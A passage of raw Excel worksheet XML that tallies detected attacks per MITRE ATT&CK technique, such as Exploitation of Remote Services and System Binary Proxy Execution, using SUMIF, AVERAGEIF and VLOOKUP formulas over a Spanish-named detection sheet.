        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU41" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV41" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW41" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX41" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY41" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ41" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA41" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB41" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC41" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>62</v>
      </c>
      <c r="BD41" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>58</v>
      </c>
      <c r="BE41" s="4" t="str">
        <f t="shared" si="8"/>
        <v>58 (62)</v>
      </c>
      <c r="BF41" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>4</v>
      </c>
      <c r="BG41" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH41" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>33</v>
      </c>
      <c r="BI41" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ41" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK41" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL41" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM41" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN41" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO41" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>75</v>
      </c>
      <c r="BP41" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>75</v>
      </c>
      <c r="BQ41" s="4" t="str">
        <f t="shared" si="10"/>
        <v>75 (75)</v>
      </c>
      <c r="BR41" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS41" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>8</v>
      </c>
      <c r="BT41" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU41" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>73</v>
      </c>
      <c r="BV41" s="292">
        <v>8</v>
      </c>
      <c r="BW41" s="322">
        <v>8</v>
      </c>
      <c r="BX41" s="4" t="str">
        <f t="shared" si="11"/>
        <v>8 (8)</v>
      </c>
      <c r="BY41" s="12">
        <v>2</v>
      </c>
      <c r="BZ41" s="13">
        <v>1</v>
      </c>
      <c r="CA41" s="394">
        <v>7</v>
      </c>
      <c r="CB41" s="288">
        <v>16</v>
      </c>
      <c r="CC41" s="4">
        <v>15</v>
      </c>
      <c r="CD41" s="4" t="str">
        <f t="shared" si="12"/>
        <v>15 (16)</v>
      </c>
      <c r="CE41" s="4">
        <v>2</v>
      </c>
      <c r="CF41" s="4">
        <v>2</v>
      </c>
      <c r="CG41" s="13">
        <v>1</v>
      </c>
      <c r="CH41" s="394">
        <v>7</v>
      </c>
    </row>
    <row r="42" spans="1:86" ht="15" customHeight="1">
      <c r="A42" s="4">
        <f t="shared" si="13"/>
        <v>40</v>
      </c>
      <c r="B42" s="4" t="str">
        <f>IFERROR(VLOOKUP(A42,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1210</v>
      </c>
      <c r="C42" s="493" t="str">
        <f>IFERROR(VLOOKUP(B42,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exploitation of Remote Services</v>
      </c>
      <c r="D42" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B42)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>3</v>
      </c>
      <c r="E42" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>287</v>
      </c>
      <c r="F42" s="579" t="str">
        <f t="shared" si="14"/>
        <v>3 (287)</v>
      </c>
      <c r="G42" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>33</v>
      </c>
      <c r="H42" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>10</v>
      </c>
      <c r="I42" s="322" t="str">
        <f t="shared" si="0"/>
        <v>10 (33)</v>
      </c>
      <c r="J42" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>8</v>
      </c>
      <c r="K42" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="L42" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>5</v>
      </c>
      <c r="M42" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>10</v>
      </c>
      <c r="N42" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>9</v>
      </c>
      <c r="O42" s="322" t="str">
        <f t="shared" si="1"/>
        <v>9 (10)</v>
      </c>
      <c r="P42" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>8</v>
      </c>
      <c r="Q42" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="R42" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>3</v>
      </c>
      <c r="S42" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>43</v>
      </c>
      <c r="T42" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>19</v>
      </c>
      <c r="U42" s="4" t="str">
        <f t="shared" si="2"/>
        <v>19 (43)</v>
      </c>
      <c r="V42" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>16</v>
      </c>
      <c r="W42" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="X42" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>5</v>
      </c>
      <c r="Y42" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>26266</v>
      </c>
      <c r="Z42" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>795</v>
      </c>
      <c r="AA42" s="322" t="str">
        <f t="shared" si="3"/>
        <v>795 (26266)</v>
      </c>
      <c r="AB42" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>16</v>
      </c>
      <c r="AC42" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD42" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>265</v>
      </c>
      <c r="AE42" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>6603</v>
      </c>
      <c r="AF42" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>304</v>
      </c>
      <c r="AG42" s="322" t="str">
        <f t="shared" si="4"/>
        <v>304 (6603)</v>
      </c>
      <c r="AH42" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>23</v>
      </c>
      <c r="AI42" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ42" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>264</v>
      </c>
      <c r="AK42" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>32869</v>
      </c>
      <c r="AL42" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>1099</v>
      </c>
      <c r="AM42" s="322" t="str">
        <f t="shared" si="5"/>
        <v>1099 (32869)</v>
      </c>
      <c r="AN42" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>45</v>
      </c>
      <c r="AO42" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP42" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>266</v>
      </c>
      <c r="AQ42" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>16</v>
      </c>
      <c r="AR42" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>2</v>
      </c>
      <c r="AS42" s="322" t="str">
        <f t="shared" si="6"/>
        <v>2 (16)</v>
      </c>
      <c r="AT42" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>2</v>
      </c>
      <c r="AU42" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AV42" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>1</v>
      </c>
      <c r="AW42" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>29</v>
      </c>
      <c r="AX42" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>3</v>
      </c>
      <c r="AY42" s="322" t="str">
        <f t="shared" si="7"/>
        <v>3 (29)</v>
      </c>
      <c r="AZ42" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>3</v>
      </c>
      <c r="BA42" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="BB42" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC42" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>56</v>
      </c>
      <c r="BD42" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>20</v>
      </c>
      <c r="BE42" s="4" t="str">
        <f t="shared" si="8"/>
        <v>20 (56)</v>
      </c>
      <c r="BF42" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>17</v>
      </c>
      <c r="BG42" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="BH42" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>5</v>
      </c>
      <c r="BI42" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>8</v>
      </c>
      <c r="BJ42" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>6</v>
      </c>
      <c r="BK42" s="322" t="str">
        <f t="shared" si="9"/>
        <v>6 (8)</v>
      </c>
      <c r="BL42" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>6</v>
      </c>
      <c r="BM42" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="BN42" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>4</v>
      </c>
      <c r="BO42" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>553</v>
      </c>
      <c r="BP42" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>551</v>
      </c>
      <c r="BQ42" s="4" t="str">
        <f t="shared" si="10"/>
        <v>551 (553)</v>
      </c>
      <c r="BR42" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>6</v>
      </c>
      <c r="BS42" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>9</v>
      </c>
      <c r="BT42" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU42" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>283</v>
      </c>
      <c r="BV42" s="292">
        <v>12932</v>
      </c>
      <c r="BW42" s="322">
        <v>288</v>
      </c>
      <c r="BX42" s="4" t="str">
        <f t="shared" si="11"/>
        <v>288 (12932)</v>
      </c>
      <c r="BY42" s="12">
        <v>9</v>
      </c>
      <c r="BZ42" s="13">
        <v>1</v>
      </c>
      <c r="CA42" s="394">
        <v>263</v>
      </c>
      <c r="CB42" s="288">
        <v>25864</v>
      </c>
      <c r="CC42" s="4">
        <v>551</v>
      </c>
      <c r="CD42" s="4" t="str">
        <f t="shared" si="12"/>
        <v>551 (25864)</v>
      </c>
      <c r="CE42" s="4">
        <v>9</v>
      </c>
      <c r="CF42" s="4">
        <v>4</v>
      </c>
      <c r="CG42" s="13">
        <v>1</v>
      </c>
      <c r="CH42" s="394">
        <v>263</v>
      </c>
    </row>
    <row r="43" spans="1:86" ht="15" customHeight="1">
      <c r="A43" s="4">
        <f t="shared" si="13"/>
        <v>41</v>
      </c>
      <c r="B43" s="4" t="str">
        <f>IFERROR(VLOOKUP(A43,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1218</v>
      </c>
      <c r="C43" s="493" t="str">
        <f>IFERROR(VLOOKUP(B43,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>System Binary Proxy Execution</v>
      </c>
      <c r="D43" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B43)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E43" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F43" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G43" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>3</v>
      </c>
      <c r="H43" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>3</v>
      </c>
      <c r="I43" s="322" t="str">
        <f t="shared" si="0"/>
        <v>3 (3)</v>
      </c>
      <c r="J43" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>3</v>
      </c>
      <c r="K43" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L43" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M43" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N43" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O43" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P43" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q43" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R43" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S43" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>3</v>
      </c>
      <c r="T43" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>3</v>
      </c>
      <c r="U43" s="4" t="str">
        <f t="shared" si="2"/>
        <v>3 (3)</v>
      </c>
      <c r="V43" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="W43" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X43" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>1</v>
      </c>
      <c r="Y43" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>3</v>
      </c>
      <c r="Z43" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>3</v>
      </c>
      <c r="AA43" s="322" t="str">
        <f t="shared" si="3"/>
        <v>3 (3)</v>
      </c>
      <c r="AB43" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="AC43" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD43" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>1</v>
      </c>
      <c r="AE43" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>2</v>
      </c>
      <c r="AF43" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>2</v>
      </c>
      <c r="AG43" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (2)</v>
      </c>
      <c r="AH43" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>1</v>
      </c>
      <c r="AI43" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ43" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK43" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>5</v>
      </c>
      <c r="AL43" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>5</v>
      </c>
      <c r="AM43" s="322" t="str">
        <f t="shared" si="5"/>
        <v>5 (5)</v>
      </c>
      <c r="AN43" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>4</v>
      </c>
      <c r="AO43" s="16">
